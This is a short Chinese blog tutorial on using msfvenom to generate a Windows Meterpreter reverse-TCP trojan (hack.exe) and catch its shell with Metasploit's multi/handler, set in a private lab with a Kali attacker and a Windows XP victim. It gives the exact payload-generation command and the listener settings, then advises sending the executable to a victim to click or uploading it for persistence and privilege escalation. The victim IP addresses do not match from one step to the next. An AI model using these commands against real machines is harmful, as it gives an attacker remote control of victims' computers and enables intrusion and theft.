msfvenom生成windows下反弹shell


msfvenom生成反弹shell

实验环境:攻击机器 kali 192.168.43.90 (利用msfvenom 生成一个hack.exe反弹shell的木马)

                受害者机器 xp 32位  192.168.43.92

1、先查找使用的具体语句

可以先进入msf中利用search 进行搜索具体的使用语句(payload/windows/meterpreter/reverse_tcp 默认是攻击x86的windows机器,如需要攻击x64的windows机器可以利用payload/windows/x64/meterpreter/reverse_tcp,本次攻击的是)

msf5 > search meterpreter/reverse_tcp

2、利用msfvenom 生成一个hack.exe反弹shell的木马

root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.90 LPORT=4444 -f exe -o hack.exe

其中LHOST是攻击发起者的IP,LPORT是受害者将要连接的攻击者打开的端口


3、再再kali里面打开一个窗口,利用multi/handler进行监听来自受害者192.168.43.11的反弹过来的shell

msf5> use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST=192.168.43.90

set LPORT=4444


监听等待

(后续发现前面生成的4444端口的hack.exe有点问题,就重新用55555端口的重新生成了一个)

4、把hack.exe发送给受害者进行点击(或者利用文件上传进行上传上去,并执行,用于权限维持和提权)



最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容